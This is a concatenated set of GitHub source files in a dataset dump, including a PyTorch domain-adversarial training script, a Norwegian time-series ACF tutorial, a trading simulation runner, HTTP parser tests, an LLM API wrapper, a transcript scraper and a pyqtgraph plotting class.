A\n elif args.tgt == 'C':\n tgt = C\n elif args.tgt == 'P':\n tgt = P\n elif args.tgt == 'R':\n tgt = R\n a = './data/amazon.txt'\n w = './data/webcam.txt'\n d = './data/dslr.txt'\n if args.src == 'a':\n src = a\n office = True\n elif args.src == 'w':\n src = w\n office = True\n elif args.src == 'd':\n src = d\n noe = noe + 1\n office = True\n if args.tgt == 'a':\n tgt = a\n noe = noe + 1\n elif args.tgt == 'w':\n tgt = w\n elif args.tgt == 'd':\n tgt = d\n return src, tgt, office,noe\n\n\nsrc, tgt, office, noe = get_datasetname(args)\n\nbatch_size = {\"train\": 36, \"val\": 36, \"test\": 4}\n\nbatch_size = {\"train\": 36, \"val\": 36, \"test\": 4}\nfor i in range(10):\n batch_size[\"val\" + str(i)] = 4\n\ndata_transforms = {\n 'train': tran.transform_train(resize_size=256, crop_size=224),\n 'val': tran.transform_train(resize_size=256, crop_size=224),\n }\ndata_transforms = tran.transform_test(data_transforms=data_transforms, resize_size=256, crop_size=224)\ndsets = {\"train\": ImageList(open(src).readlines(), transform=data_transforms[\"train\"]),\n \"val\": ImageList(open(tgt).readlines(), transform=data_transforms[\"val\"]),\n \"test\": ImageList(open(tgt).readlines(),transform=data_transforms[\"val\"])}\ndset_loaders = {x: torch.utils.data.DataLoader(dsets[x], batch_size=batch_size[x],\n shuffle=True, num_workers=4)\n for x in ['train', 'val']}\ndset_loaders[\"test\"] = torch.utils.data.DataLoader(dsets[\"test\"], batch_size=batch_size[\"test\"],\n shuffle=False, num_workers=4)\n\nfor i in range(10):\n dsets[\"val\" + str(i)] = ImageList(open(tgt).readlines(),\n transform=data_transforms[\"val\" + str(i)])\n dset_loaders[\"val\" + str(i)] = torch.utils.data.DataLoader(dsets[\"val\" + str(i)],\n batch_size=batch_size[\"val\" + str(i)], shuffle=False,\n num_workers=4)\n\ndset_sizes = {x: len(dsets[x]) for x in ['train', 'val'] + [\"val\" + str(i) for i in range(10)]}\ndset_classes = range(65)\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu_id\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nmax_iter = args.num_iter\n\n\ndef test_target(loader, model, test_iter=0):\n with torch.no_grad():\n start_test = True\n if test_iter > 0:\n iter_val = iter(loader['val0'])\n for i in range(test_iter):\n data = iter_val.next()\n inputs = data[0]\n labels = data[1]\n inputs = inputs.to(device)\n labels = labels.to(device)\n outputs = model(inputs)\n if start_test:\n all_output = outputs.data.float()\n all_label = labels.data.float()\n start_test = False\n else:\n all_output = torch.cat((all_output, outputs.data.float()), 0)\n all_label = torch.cat((all_label, labels.data.float()), 0)\n else:\n iter_val = [iter(loader['val' + str(i)]) for i in range(10)]\n for i in range(len(loader['val0'])):\n data = [iter_val[j].next() for j in range(10)]\n inputs = [data[j][0] for j in range(10)]\n labels = data[0][1]\n for j in range(10):\n inputs[j] = inputs[j].to(device)\n labels = labels.to(device)\n outputs = []\n for j in range(10):\n output = model(inputs[j])\n outputs.append(output)\n outputs = sum(outputs)\n if start_test:\n all_output = outputs.data.float()\n all_label = labels.data.float()\n start_test = False\n else:\n all_output = torch.cat((all_output, outputs.data.float()), 0)\n all_label = torch.cat((all_label, labels.data.float()), 0)\n _, predict = torch.max(all_output, 1)\n accuracy = torch.sum(torch.squeeze(predict).float() == all_label).item() / float(all_label.size()[0])\n return accuracy\n\ndef inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, 
init_lr=0.001, weight_decay=0.0005):\n \"\"\"Decay learning rate by a factor of 0.1 every lr_decay_epoch epochs.\"\"\"\n lr = init_lr * (1 + gamma * iter_num) ** (-power)\n i = 0\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr * param_lr[i]\n param_group['weight_decay'] = weight_decay * 2\n i += 1\n return optimizer\n\n\nclass BSP_CDAN(nn.Module):\n\n def __init__(self, num_feature):\n super(BSP_CDAN, self).__init__()\n self.model_fc = model.Resnet50Fc()\n self.bottleneck_layer1 = nn.Linear(num_feature, 256)\n self.bottleneck_layer1.apply(init_weights)\n self.bottleneck_layer = nn.Sequential(self.bottleneck_layer1, nn.ReLU(), nn.Dropout(0.5))\n self.classifiler_layer = nn.Linear(256, len(dset_classes))\n self.classifiler_layer.apply(init_weights)\n self.predict_layer = nn.Sequential(self.model_fc, self.bottleneck_layer, self.classifiler_layer)\n\n def forward(self, x):\n feature = self.model_fc(x)\n out = self.bottleneck_layer(feature)\n outC = self.classifiler_layer(out)\n\n return out, outC\n\n\ndef init_weights(m):\n classname = m.__class__.__name__\n if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1:\n nn.init.kaiming_uniform_(m.weight)\n nn.init.zeros_(m.bias)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight, 1.0, 0.02)\n nn.init.zeros_(m.bias)\n elif classname.find('Linear') != -1:\n nn.init.xavier_normal_(m.weight)\n nn.init.zeros_(m.bias)\n\n\ndef calc_coeff(iter_num, high=1.0, low=0.0, alpha=10.0, max_iter=10000.0):\n return np.float(2.0 * (high - low) / (1.0 + np.exp(-alpha * iter_num / max_iter)) - (high - low) + low)\n\n\ndef grl_hook(coeff):\n def fun1(grad):\n return -coeff * grad.clone()\n\n return fun1\n\n\nclass AdversarialNetwork(nn.Module):\n\n def __init__(self, input_feature, hidden_size, dropout_rate=0.5):\n super(AdversarialNetwork, self).__init__()\n self.ad_layer1 = nn.Linear(in_features=input_feature, out_features=hidden_size)\n self.ad_layer2 = nn.Linear(in_features=hidden_size, out_features=hidden_size)\n self.ad_layer3 = nn.Linear(in_features=hidden_size, out_features=1)\n\n self.relu1 = nn.ReLU()\n self.relu2 = nn.ReLU()\n\n self.dropout1 = nn.Dropout(dropout_rate)\n self.dropout2 = nn.Dropout(dropout_rate)\n\n self.sigmoid = nn.Sigmoid()\n self.apply(init_weights)\n\n self.iter_num = 0\n self.alpha = 10\n self.low = 0.0\n self.high = 1.0\n self.max_iter = 10000.0\n\n def forward(self, x):\n if self.training == 1:\n self.iter_num += 1\n coeff = calc_coeff(iter_num=self.iter_num, high=self.high, low=self.low,\n alpha=self.alpha, max_iter=self.max_iter)\n x.register_hook(grl_hook(coeff=coeff))\n\n x = self.ad_layer1(x)\n x = self.relu1(x)\n x = self.dropout1(x)\n x = self.ad_layer2(x)\n x = self.relu2(x)\n x = self.dropout2(x)\n y = self.ad_layer3(x)\n y = self.sigmoid(y)\n\n return y\n\n def output_num(self):\n return 1\n\n def get_parameters(self):\n return [{\"params\": self.parameters(), \"lr_mult\": 10, 'decay_mult': 2}]\n\n\nnum_feature = 2048\nnet = BSP_CDAN(num_feature=num_feature)\nnet = net.to(device)\nad_net = AdversarialNetwork(input_feature=256, hidden_size=100)\nad_net = ad_net.to(device)\nnet.train(True)\nad_net.train(True)\n\ncriterion = {\"classifier\": nn.CrossEntropyLoss(), \"adversarial\": nn.BCELoss()}\noptimizer_dict = [{\"params\": filter(lambda p: p.requires_grad, net.model_fc.parameters()), \"lr\": 0.1},\n {\"params\": filter(lambda p: p.requires_grad, net.bottleneck_layer.parameters()), \"lr\": 1},\n {\"params\": filter(lambda p: p.requires_grad, 
net.classifiler_layer.parameters()), \"lr\": 1},\n {\"params\": filter(lambda p: p.requires_grad, ad_net.parameters()), \"lr\": 1}]\n\noptimizer = optim.SGD(optimizer_dict, lr=0.1, momentum=0.9, weight_decay=0.0005, nesterov=True)\n\n# train_cross_loss = train_transfer_loss = train_total_loss = train_sigma = 0.0\ntrain_classifier_loss = 0.0\ntrain_domain_loss = 0.0\ntrain_total_loss = 0.0\n\n\nlen_source = len(dset_loaders[\"train\"]) - 1\nlen_target = len(dset_loaders[\"val\"]) - 1\n\nparam_lr = []\niter_source = iter(dset_loaders[\"train\"])\niter_target = iter(dset_loaders[\"val\"])\n\nfor param_group in optimizer.param_groups:\n param_lr.append(param_group[\"lr\"])\n\ntest_interval = 100\nnum_iter = max_iter\n\nfor iter_num in range(1, num_iter + 1):\n print(iter_num)\n net.train(True)\n\n optimizer = inv_lr_scheduler(param_lr, optimizer, iter_num, init_lr=0.003, gamma=0.001, power=0.75)\n optimizer.zero_grad()\n\n if iter_num % len_source == 0:\n iter_source = iter(dset_loaders[\"train\"])\n if iter_num % len_target == 0:\n iter_target = iter(dset_loaders[\"val\"])\n\n data_source = iter_source.next()\n data_target = iter_target.next()\n\n input_source, label_source = data_source\n input_target, label_target = data_target\n\n inputs = torch.cat([input_source, input_target], dim=0)\n\n dc_target = torch.from_numpy(np.array([[1], ] * batch_size[\"train\"] + [[0], ] * batch_size[\"train\"])).float()\n\n inputs = inputs.to(device)\n labels =label_source.to(device)\n dc_target = dc_target.to(device)\n\n feature, outC = net(inputs)\n\n classifier_loss = criterion[\"classifier\"](outC.narrow(0, 0, batch_size[\"train\"]), labels)\n domain_logits = ad_net(feature)\n domain_loss = criterion[\"adversarial\"](domain_logits, dc_target)\n\n total_loss = classifier_loss + domain_loss\n total_loss.backward()\n optimizer.step()\n\n train_total_loss += total_loss.item()\n train_classifier_loss += classifier_loss.item()\n train_domain_loss += domain_loss.item()\n\n if iter_num % test_interval == 0:\n print(\"global stpes: %d\\t total_loss:%f\\t domain_loss:%f\\t label_loss:%f\"\n % (iter_num, train_total_loss, train_domain_loss, train_classifier_loss))\n train_classifier_loss = 0.0\n train_domain_loss = 0.0\n train_total_loss = 0.0\n\n net.eval()\n test_acc = test_target(loader=dset_loaders, model=net.predict_layer)\n print('test_acc:%.4f' % (test_acc))\n\n\n\n","repo_name":"jozerozero/my_dann","sub_path":"DANN.py","file_name":"DANN.py","file_ext":"py","file_size_in_byte":11931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18490421877","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Estimering av ACF\n\n# In[1]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom statsmodels.tsa.stattools import acf \n# if this gives you a warning, you should install the latest version of statsmodels.\n# you can download it as explained here: https://www.statsmodels.org/stable/index.html\n\n\n# In[2]:\n\n\nwn = np.random.normal(loc=5, scale=10, size=100)\nplt.plot(wn);\n\n\n# In[3]:\n\n\ndef sample_acvf(x,maxlag=None): #function consistent with Eq. (1.36) in textbook\n n = len(x)\n if maxlag==None:\n maxlag=n-1\n xmean = np.mean(x)\n gamma = np.zeros(maxlag)\n for h in range(0,maxlag):\n gamma[h] = 1/n*(x[h:]-xmean)@(x[:n-h]-xmean)\n #gamma[h] = 1/(n-h)*(x[h:]-xmean)@(x[:n-h]-xmean) # alternativ mindre brukt estimator\n return gamma\n\ndef sample_acf(x,maxlag=None): # function consistent with Eq. 
(1.37) in textbook\n acvf = sample_acvf(x,maxlag=maxlag)\n return acvf/acvf[0]\n\n\n# In[4]:\n\n\nfig, ax = plt.subplots(nrows=2,ncols=1,figsize = [15,9])\n\nax[0].plot(sample_acf(wn,maxlag=100))\nax[0].set_title('ACF implementert som beskrevet i læreboka',fontsize = 18)\nax[0].grid()\nax[0].tick_params(axis='both',labelsize=22)\n\nax[1].plot(acf(wn,nlags=100),color='red')\nax[1].set_title('ACF innebygd i Statsmodels',fontsize = 18)\nax[1].grid()\nax[1].set_xlabel('Time lag (h)',fontsize = 18)\nax[1].tick_params(axis='both',labelsize=18)\n\n\n# In[5]:\n\n\ndef acf_comp(x): # vi skal ikke bruke denne definisjonen\n n = len(x)\n xmean = np.mean(x)\n Rxx = np.zeros(n)\n for h in range(0,n):\n Rxx[h] = 1/n*(x[h:])@(x[:n-h])\n return Rxx\n\n\n# In[6]:\n\n\nplt.plot(acf_comp(wn));\n\n\n# ## ACF eksempler\n\n# In[7]:\n\n\n# Hvit støy igjen\n\nn=1000\nwn = np.random.normal(loc=0, scale=1, size=n)\n\nfig, ax = plt.subplots(ncols=1,nrows=2,figsize = [16,10])\nax[0].plot(wn);\nax[0].set_title('White noise',fontsize = 18)\nax[0].grid()\nax[0].set_xlim(0,n)\nax[0].tick_params(axis='both',labelsize=18)\n\nax[1].stem(np.arange(101),acf(wn,nlags=100))\n#ax[1].plot(np.arange(101),np.full(101,2/np.sqrt(n)),'--',color='gray')\n#ax[1].plot(np.arange(101),np.full(101,-2/np.sqrt(n)),'--',color='gray')\nax[1].grid()\nax[1].set_xlim(-1,100)\nax[1].set_ylabel('ACF',fontsize = 18)\nax[1].set_xlabel('Time lag',fontsize = 18)\nax[1].tick_params(axis='both',labelsize=18)\n\n\n# In[8]:\n\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfiledir = '/Users/hege-beatefredriksen/OneDrive - UiT Office 365/Teaching/STA-2003spring2019/Data/saved_from_astsa'\nfilename = 'soi.txt'\n\nfile = os.path.join(filedir, filename)\n\n# load data\ndatatable = pd.read_table(file,sep='\\t',engine='python')\nyear=datatable.iloc[:,0].values\nsoi=datatable.iloc[:,1].values\n\nn=len(soi)\n\nfig, ax = plt.subplots(ncols=1,nrows=2,figsize = [16,10])\nax[0].plot(year,soi);\nax[0].set_xlabel('Year',fontsize = 18)\nax[0].set_title('Southern Oscillation index',fontsize = 18)\nax[0].grid()\nax[0].set_xlim(min(year),max(year))\nax[0].tick_params(axis='both',labelsize=18)\n\nax[1].stem(np.arange(49)/12,acf(soi,nlags=4*12))\n#ax[1].plot(np.arange(49)/12,np.full(49,2/np.sqrt(n)),'--',color='gray')\n#ax[1].plot(np.arange(49)/12,np.full(49,-2/np.sqrt(n)),'--',color='gray')\nax[1].grid()\nax[1].set_ylabel('ACF',fontsize = 18)\nax[1].set_xlabel('Time lag (years)',fontsize = 18)\nax[1].tick_params(axis='both',labelsize=18)\n\n\n# In[9]:\n\n\nfilename = 'rec.txt'\nfile = os.path.join(filedir, filename)\n\n# load data\ndatatable = pd.read_table(file,sep='\\t',engine='python')\nyear=datatable.iloc[:,0].values\nrec=datatable.iloc[:,1].values\n\nfig, ax = plt.subplots(ncols=1,nrows=2,figsize = [16,10])\nax[0].plot(year,rec);\nax[0].set_xlabel('Year',fontsize = 18)\nax[0].set_title('Recruitment',fontsize = 18)\nax[0].grid()\nax[0].set_xlim(min(year),max(year))\nax[0].tick_params(axis='both',labelsize=18)\n\nax[1].stem(np.arange(49)/12,acf(rec,nlags=4*12))\n#ax[1].plot(np.arange(49)/12,np.full(49,2/np.sqrt(n)),'--',color='gray')\n#ax[1].plot(np.arange(49)/12,np.full(49,-2/np.sqrt(n)),'--',color='gray')\nax[1].grid()\nax[1].set_ylabel('ACF',fontsize = 18)\nax[1].set_xlabel('Time lag (years)',fontsize = 18)\nax[1].tick_params(axis='both',labelsize=18)\n\n\n# ## Kryss-korrelasjon. 
Bruker innebygd funksjon, og velger biased estimator\n\n# In[10]:\n\n\nfrom statsmodels.tsa.stattools import ccf \ncrosscorr_xy = ccf(soi,rec,unbiased=False) # vi skal bruke estimatoren som er biased. Merk at denne ikke er default.\n\nmaxlag = 12*4\n\nfig, ax = plt.subplots(figsize = [14,5])\nplt.stem(np.arange(maxlag+1)/12,crosscorr_xy[:maxlag+1])\nax.grid()\nax.set_ylabel('CCF',fontsize = 18)\nax.set_xlabel('Time lag (years)',fontsize = 18)\nax.tick_params(axis='both',labelsize=18)\n\n\n# In[11]:\n\n\ncrosscorr_yx = ccf(rec,soi,unbiased=False)\nmaxlag = 12*4\n\nfig, ax = plt.subplots(figsize = [14,5])\nplt.stem(np.arange(maxlag+1)/12,crosscorr_yx[:maxlag+1])\nax.grid()\nax.set_ylabel('ACF',fontsize = 18)\nax.set_xlabel('Time lag (years)',fontsize = 18)\nax.tick_params(axis='both',labelsize=18)\n\n\n# ## Kombinerer disse for å se på både positive og negative time lag\n\n# In[12]:\n\n\nprint(crosscorr_xy[0])\ncrosscorr_yx[::-1][-1]\n\n\n# In[13]:\n\n\nmaxlag=12*4\ncrosscorr = np.concatenate((crosscorr_yx[::-1][-maxlag-1:], crosscorr_xy[1:maxlag+1]))\n\nfig, ax = plt.subplots(figsize = [14,5])\nax.stem(np.arange(-maxlag, maxlag+1)/12,crosscorr);\nax.plot(np.arange(-maxlag, maxlag+1)/12,np.full(2*maxlag+1,2/np.sqrt(n)),'--',color='gray')\nax.plot(np.arange(-maxlag, maxlag+1)/12,np.full(2*maxlag+1,-2/np.sqrt(n)),'--',color='gray')\nax.grid()\nax.set_title('Kryss-korrelasjon mellom Recruitment og SOI',fontsize = 18)\nax.set_ylabel('CCF',fontsize = 18)\nax.set_xlabel('Time lag (years)',fontsize = 18)\nax.tick_params(axis='both',labelsize=18)\n\n\n# In[14]:\n\n\nfig, ax = plt.subplots(figsize = [6,6])\nax.scatter(rec,soi); # ved 0 time lag\nax.tick_params(axis='both',labelsize=18)\nax.set_ylabel('SOI',fontsize = 18)\nax.set_xlabel('Recruitment',fontsize = 18)\n\n\n# In[15]:\n\n\nprint(np.corrcoef(rec[6:],soi[:-6])[1,0])\n\nfig, ax = plt.subplots(figsize = [6,6])\nax.scatter(rec[6:],soi[:-6]); # ved time lag 6\nax.tick_params(axis='both',labelsize=18)\nax.set_ylabel('SOI',fontsize = 18)\nax.set_xlabel('Recruitment lagged with 6 months',fontsize = 18);\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"MartinRovang/UniversityPhysics","sub_path":"Tidsrekker/Scripts/ACF_estimation.py","file_name":"ACF_estimation.py","file_ext":"py","file_size_in_byte":6194,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"20725161068","text":"import pandas as pd\nfrom trnsim.strategy import *\n\nif __name__ == '__main__' :\n data = pd.read_csv('./data/simulation_2022f.csv', sep=',')\n hold_days=1\n look_back_days=5\n high_cut=0.99\n low_cut=0.6\n spare_amount=300000\n max_portion=0.5\n fmc = ['XL', 'LG', 'SM']\n strgy = BuyHighSellLow(\n watching_list=data[data['model'].str[:2].isin(fmc)], \n begin='2022-01-01', end='2023-12-30', \n ranking_metric='score', high_cut=high_cut, low_cut=low_cut , verbose=0, funding=spare_amount,\n hold_days=hold_days, look_back_days=10, max_portion=max_portion\n )\n output1 = strgy.run()\n\n print(output1)\n result = pd.DataFrame.from_dict(strgy.stats)\n # result.plot()\n result.to_csv('net_{}_{}_{}_{}_{}.csv'.format('2022f300k', ''.join(fmc), high_cut, low_cut, max_portion), index=None)\n \n # output1 = BuyHighSellLow(\n # watching_list=data[data['model'].str[:2]=='MD'], begin='2022-12-01', end='2023-12-31', \n # ranking_metric='score', high_cut=0.99, low_cut=0.7, verbose=1, spare_amount=spare_amount,\n # hold_days=hold_days, look_back_days=look_back_days\n # ).run()\n\n # 
print(output1)","repo_name":"rexzhang2014/trn-sim","sub_path":"src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19852019256","text":"import pytest\nimport io\n\nfrom http_parser.http import HttpStream\nfrom http_parser.parser import HttpParser\nfrom http_parser.pyparser import HttpParser as PyHttpParser\n\ndef _test_no_headers(parser):\n data = b'HTTP/1.1 200 Connection established\\r\\n\\r\\n'\n assert parser.execute(data, len(data)) == len(data)\n assert parser.is_headers_complete()\n assert parser.is_message_begin()\n assert not parser.is_partial_body()\n assert not parser.is_message_complete()\n\ndef _test_headers(parser):\n data = (b'HTTP/1.1 200 OK\\r\\n'\n b'Connection: Keep-Alive\\r\\n'\n b'Content-Length: 4\\r\\n'\n b'Content-type: text/plain\\r\\n\\r\\n'\n b'ciao')\n assert parser.execute(data, len(data)) == len(data)\n assert parser.is_headers_complete()\n assert parser.is_message_begin()\n assert parser.is_partial_body()\n assert parser.is_message_complete()\n\ndef test_client_no_headers():\n _test_no_headers(HttpParser())\n\ndef test_client_no_headers_py():\n _test_no_headers(PyHttpParser())\n\ndef test_client_headers():\n _test_headers(HttpParser())\n\ndef test_client_headers_py():\n _test_headers(PyHttpParser())\n\n","repo_name":"benoitc/http-parser","sub_path":"testing/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":338,"dataset":"github-code","pt":"81"} +{"seq_id":"25563658599","text":"import os\nimport requests\nimport json\nimport copy\nfrom dotenv import load_dotenv\n\nload_dotenv() # take environment variables from .env.\n\n\"\"\"\ndefault_params: dict = {\n \"max_tokens\": 128,\n \"temperature\": 0.8,\n \"top_p\": 0.95,\n \"top_k\": 40,\n \"repeat_penalty\": 1.1,\n \"stop\": []\n}\n\"\"\"\n\ncompletion_prompt_template = \"Q: {}? 
A: \"\ndefault_completion_params = {\"stop\": [\"Q:\", \"A:\", \"\\n\"]} \nuser=\"Human: \"\nassistant=\"AI: \"\ndefault_chat_params = {\"stop\": [user, assistant, \"\\n\"]} \ndef get_completion(prompt: str = None,\n params: dict = None,\n is_completion: bool = True):\n if is_completion:\n prompt = completion_prompt_template.format(prompt)\n completion_params = copy.deepcopy(default_completion_params)\n if params:\n completion_params.update(params)\n params = completion_params\n print(\"params\", params) \n payload = {\"prompt\": prompt, \"params\": params}\n api_url = os.environ.get(\"API_URL\")\n headers = {\n \"Content-Type\": \"application/json\",\n # \"Authorization\": f\"Bearer {os.environ['HF_API_TOKEN']}\"\n }\n\n data = json.dumps(payload)\n response = requests.request(\"POST\", api_url, headers=headers, data=data)\n completion = json.loads(response.content.decode(\"utf-8\"))\n return completion['message']['choices'][0]['text']\n\n\ndef format(messages=[], system=\"\", user=user, assistant=assistant):\n \"\"\"\n Format the messages from the API into human readable strings.\n \"\"\"\n formatted_message = \"\"\n\n for message in messages:\n if message['role'] == 'system':\n formatted_message += f\"{system}{message['content']}\\n\"\n elif message['role'] == 'user':\n formatted_message += f\"{user}{message['content']}\\n\"\n elif message['role'] == 'assistant':\n formatted_message += f\"{assistant}{message['content']}\\n\"\n\n return formatted_message\n\n\ndef get_completion_from_messages(messages=[],\n params: dict = None):\n prompt = format(messages)\n chat_params = copy.deepcopy(default_chat_params)\n if params:\n chat_params.update(params)\n return get_completion(prompt, chat_params, is_completion = False)\n\n\nif __name__ == '__main__':\n print(get_completion('AI is going to', params={\"temperature\": 0.5}))\n","repo_name":"limcheekin/prompt-engineering-for-developers","sub_path":"openllama-7b/generate_api.py","file_name":"generate_api.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35862372017","text":"\nfrom Binary_search_Recursive import searchHelper\n\ndef search(array , target):\n bound = 1 \n while bound < len(array) and array[bound] < target:\n bound *= 2 \n left = bound // 2\n right = min(bound, len(array)) \n return searchHelper(array, target, left , right)","repo_name":"neuodev/Searching-Algorithms","sub_path":"Exponential_Search.py","file_name":"Exponential_Search.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"3157241643","text":"from threading import Thread, Event\nimport time\n\n# Code to execute in an independent thread\n\n\ndef countdown(n, started_evt):\n print('1 new thread starting --- countdown starting')\n started_evt.set()\n while n > 0:\n print('T-minus', n)\n n -= 1\n time.sleep(1)\n\n\n# Create the event object that will be used to signal startup\nstarted_evt = Event()\n\n# Launch the thread and pass the startup event\nprint('Launching new thread --- countdown')\nt = Thread(target=countdown, args=(10, started_evt))\nt.start()\n\n# Wait for the thread to start\n\"\"\"\n当你执行这段代码,“1 countdown is running” 总是显示在 “countdown starting” 之后显示。这是由于使用 event 来协调线程,使得主线程要等到 countdown() 函数输出启动信息后,才能继续执行。\n\"\"\"\nstarted_evt.wait()\nprint('2 new thread --- countdown is 
running')\n","repo_name":"kevinxzl/python","sub_path":"p3/thread/thread04.py","file_name":"thread04.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25793917133","text":"from bs4 import BeautifulSoup\nimport requests\nimport json\nimport argparse\nimport os\nimport pathlib\nfrom segment import Segment\n\n\n # url = 'https://theinfosphere.org/Transcript:Space_Pilot_3000'\n\n\ndef parse_time(time_id):\n return time_id[len('time-'):].split('-')\n\ndef get_segments_from_url(url: str):\n print(\"OPENING URL \" + url)\n page = requests.get(url)\n\n # Init soup\n soup = BeautifulSoup(page.text, \"html.parser\")\n # transcript = soup.find(\"div\", {\"class\": \"mw-parser-output\"})\n transcript = soup.find(\"div\", {\"id\": \"bodyContent\"})\n sections = transcript.find_all(\"div\", {\"class\": \"poem\"})\n\n # Parsing vars\n segments = []\n last_cleaned_text = 'NO TEXT SET'\n last_speaker = 'NO_SPEAKER_SET'\n last_time = [-1, -1]\n # Lags behind the sections by one section to roughly chop up the sections by timestamp\n for section in sections:\n if not (section.p.span):\n print(\"WARNING: Section without timestamp.\")\n print(\"SKIPPING SEGMENT\")\n print(section.p)\n print(\"CONTINUING\")\n continue\n \n # Timestamp ([m, s])\n current_time = parse_time(section.p.span['id'])\n\n # Update segments\n if last_time != [-1, -1]:\n segment = Segment(last_speaker, last_cleaned_text, last_time[0], last_time[1], current_time[0], str(int(current_time[1])-1))\n segments.append(segment) \n print(\"SEGMENT: \" + str(segment))\n\n # Set last time regardless of whether it's the first run or not\n last_time = current_time\n\n # Speaker\n last_speaker = section.p.b.text\n \n # ????\n speaker_section = section.p.find('b')\n speaker_section.extract()\n \n print(\"SECTION: \" + section.p.span['id'])\n time_section = section.p.span\n time_section.extract()\n \n # TODO: ???? 
i forgor\n\n # Text\n last_cleaned_text = section.p.text.rstrip()[2:]\n \n return segments\n\ndef write_segments(url: str, segment_output_filename: pathlib.Path):\n segments = get_segments_from_url(url)\n with open(segment_output_filename, \"w+\") as f:\n f.write(json.dumps(segments, default=(lambda x: x.__dict__ )))\n print(\"Output saved to \" + segment_output_filename)\n\ndef main():\n parser = argparse.ArgumentParser(\n prog='Transcript Scrape and Transform CLI',\n description='Read transcripts and transform them into Segment data.')\n # epilog='Text at the bottom of help')\n\n parser.add_argument('-t', '--transcript',\n type=pathlib.Path,\n default='transcripts.txt')\n \n parser.add_argument('output_dir', help='Path to generate segments folder in.', nargs='?', default='segment_data')\n\n \n args = parser.parse_args()\n\n # Output dir check/creation\n if os.path.exists(args.output_dir):\n raise Exception('ERROR: output_dir already exists.')\n else:\n os.mkdir(args.output_dir)\n\n with open(args.transcript, 'r') as f:\n for line in f:\n [full_filename, url] = line.strip().split('|')\n filename = full_filename.split('.')[0]\n write_segments(url, os.path.join(args.output_dir, filename + \"_segments.json\"))\n print(filename)\n print(url)\n\nif __name__ == '__main__':\n main()\n\n# Run w/ hardcoded args\n# segments = get_segments()\n# with open(\"seg_out.json\", \"w+\") as f:\n# f.write(json.dumps(segments, default=(lambda x: x.__dict__ )))\n# #for segment in segments:\n# # f.write(json.dumps(segment.__dict__))\n# print(\"Output saved to seg_out.json\")","repo_name":"jackalope-code/future-tts","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13190204670","text":"import pyqtgraph as pg\nimport time\n\nclass Plotter():\n def __init__(self, app, plots_per_row, window_width=1280,\n window_height=800):\n self._app = app\n self._window = pg.QtWidgets.QMainWindow()\n self._window.resize(window_width,window_height)\n self._plots_per_row = plots_per_row\n if self._plots_per_row < 1:\n self._plots_per_row = 1\n self._layout = pg.QtWidgets.QGridLayout()\n self._num_plots = 0\n self._plot_dict = {}\n self._window_length_list = []\n self._xdata_list = []\n self._ydata_list = []\n self._data_lines_list = []\n self._data_line_labels = []\n self._pen_list = []\n self._widget = pg.QtWidgets.QWidget()\n self._widget.setLayout(self._layout)\n self._window.setCentralWidget(self._widget)\n \n def create_plot_widget(self, plot_id=\"\", xlabel=\"x_label\", ylabel=\"y_label\", \n legend=True, background_color=\"k\", window_length=100):\n row = self._num_plots//self._plots_per_row\n col = self._num_plots%self._plots_per_row\n plot_widget = pg.PlotWidget()\n plot_widget.setLabel('left', ylabel)\n plot_widget.setLabel('bottom', xlabel)\n plot_widget.setBackground(background_color)\n if legend == True:\n plot_widget.addLegend()\n self._layout.addWidget(plot_widget,row,col)\n if plot_id == \"\":\n plot_id = str(self._num_plots)\n self._plot_dict[plot_id] = self._num_plots\n self._window_length_list.append(window_length)\n self._xdata_list.append([])\n self._ydata_list.append([])\n self._data_lines_list.append([])\n self._data_line_labels.append({})\n self._num_plots += 1\n\n def create_data_set(self, plot_id, data_label, data_color=(255,0,0), data_thickness=15): #add func to change line thickenss\n plot_index = self._plot_dict[plot_id]\n pen = 
pg.mkPen(color=data_color)\n data_line = self._layout.itemAt(plot_index).widget().plot([], [], \n name=data_label, width=data_thickness, pen=pen)\n self._data_lines_list[plot_index].append(data_line)\n self._xdata_list[plot_index].append([])\n self._ydata_list[plot_index].append([])\n self._data_line_labels[plot_index][data_label] = len(self._data_lines_list[plot_index]) - 1\n\n def add_data_point(self, plot_id, data_label, xvalue, yvalue):\n plot_index = self._plot_dict[plot_id]\n dataset_index = self._data_line_labels[plot_index][data_label]\n self._xdata_list[plot_index][dataset_index].append(xvalue)\n self._ydata_list[plot_index][dataset_index].append(yvalue)\n if len(self._xdata_list[plot_index][dataset_index]) > self._window_length_list[plot_index]:\n self._xdata_list[plot_index][dataset_index].pop(0)\n self._ydata_list[plot_index][dataset_index].pop(0)\n\n def add_data_points(self, plot_id, data_label, xvalues, yvalues):\n plot_index = self._plot_dict[plot_id]\n dataset_index = self._data_line_labels[plot_index][data_label]\n self._xdata_list[plot_index][dataset_index] = self._xdata_list[plot_index][dataset_index] + xvalues\n self._ydata_list[plot_index][dataset_index] = self._ydata_list[plot_index][dataset_index] + yvalues\n len_arr = len(self._xdata_list[plot_index][dataset_index])\n 